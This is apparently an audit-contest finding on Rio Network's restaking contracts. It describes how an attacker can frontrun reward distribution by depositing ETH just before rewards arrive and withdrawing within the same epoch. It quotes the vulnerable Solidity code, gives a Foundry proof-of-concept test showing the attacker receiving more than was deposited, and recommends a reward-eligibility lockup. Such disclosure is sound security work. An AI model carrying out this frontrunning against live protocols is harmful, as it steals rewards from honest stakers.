### ISSUE TITLE
araj - Attacker can frontrun `rewardDistribution` to steal other stakers reward

### ISSUE THREAD

**Issue by sherlock-admin** [sherlock-audit/2024-02-rio-network-core-protocol-judging#217]
araj

medium

# Attacker can frontrun `rewardDistribution` to steal other stakers reward

## Summary
Attacker can steal other stakers reward by frontrunning `RioLRTOperatorDelegator::scrapeNonBeaconChainETHFromEigenPod()`

## Vulnerability Detail
DepositPool receives the reward from `RioLRTRewardDistributor` after calling `RioLRTOperatorDelegator::scrapeNonBeaconChainETHFromEigenPod()`.
```solidity
 function scrapeNonBeaconChainETHFromEigenPod() external {
        eigenPod.withdrawNonBeaconChainETHBalanceWei(
    @>        address(rewardDistributor()), eigenPod.nonBeaconChainETHBalanceWei()
        );
    }
```
```solidity
    receive() external payable {
        ////Code.....
        if (treasuryShare > 0) treasury.transferETH(treasuryShare);
        if (operatorShare > 0) operatorRewardPool.transferETH(operatorShare);
  @>      if (poolShare > 0) address(depositPool()).transferETH(poolShare);

        emit ETHValidatorRewardsDistributed(treasuryShare, operatorShare, poolShare);
    }
```
 This reward is `distributed` among all the `stakers`, who are holding LRTtoken(Basically it increases the value of LRTtoken). An attacker can `frontrun` this and deposit asset to `depositPool` to receive the rewards and can `withdraw` immediately(in the current epoch) after receiving rewards, stealing other users reward.

// Here is the POC(this test is simplified version, which shows attacker can frontrun reward distribution and steal rewards)
```solidity
 function test_rewardDistributionCanBeFrontrun() public {
        uint256 initialTotalSupply = reETH.token.totalSupply();

        //Depositing 10 ether frontrunning reward distribution
        uint256 LRTtoken = reETH.coordinator.depositETH{value: 10 ether}();
        //DepositPool receives 2 ether in rewards
        (bool success,) = address(reETH.depositPool).call{value: 2 ether}('');
        assertTrue(success);
        //Requesting for withdrawl
        reETH.coordinator.requestWithdrawal(ETH_ADDRESS, LRTtoken);

        uint256 withdrawalEpoch = reETH.withdrawalQueue.getCurrentEpoch(ETH_ADDRESS);

        // Rebalance to settle the withdrawal.
        vm.prank(EOA, EOA);
        reETH.coordinator.rebalance(ETH_ADDRESS);

        IRioLRTWithdrawalQueue.EpochWithdrawalSummary memory epochSummary =
            reETH.withdrawalQueue.getEpochWithdrawalSummary(ETH_ADDRESS, withdrawalEpoch);
        IRioLRTWithdrawalQueue.UserWithdrawalSummary memory userSummary =
            reETH.withdrawalQueue.getUserWithdrawalSummary(ETH_ADDRESS, withdrawalEpoch, address(this));

        // Ensure the reETH was burned.
        assertEq(reETH.token.totalSupply(), initialTotalSupply);

        assertTrue(epochSummary.settled);
        //Received asset is > 10 ether ie more than deposited
        assertGt(epochSummary.assetsReceived, 10 ether);
        assertGt(epochSummary.shareValueOfAssetsReceived, 10 ether);

        assertFalse(userSummary.claimed);

        // Claim the withdrawal.
        uint256 amountOut = reETH.withdrawalQueue.claimWithdrawalsForEpoch(
            IRioLRTWithdrawalQueue.ClaimRequest({asset: ETH_ADDRESS, epoch: withdrawalEpoch})
        );
        assertGt(amountOut, 10 ether);
    }
```
Run this test in `RioLRTWithdrawalQueueTest.t.sol` file

## Impact
Honest stakers will loose on rewards

## Code Snippet
https://github.com/sherlock-audit/2024-02-rio-network-core-protocol/blob/main/rio-sherlock-audit/contracts/restaking/RioLRTOperatorDelegator.sol#L150C4-L154C6

https://github.com/sherlock-audit/2024-02-rio-network-core-protocol/blob/main/rio-sherlock-audit/contracts/restaking/RioLRTRewardDistributor.sol#L82C1-L94C6

## Tool used
Manual Review

## Recommendation
Use some sort of locking mechanism that only after certain period, new staker can be eligible for rewards

Duplicate of #52
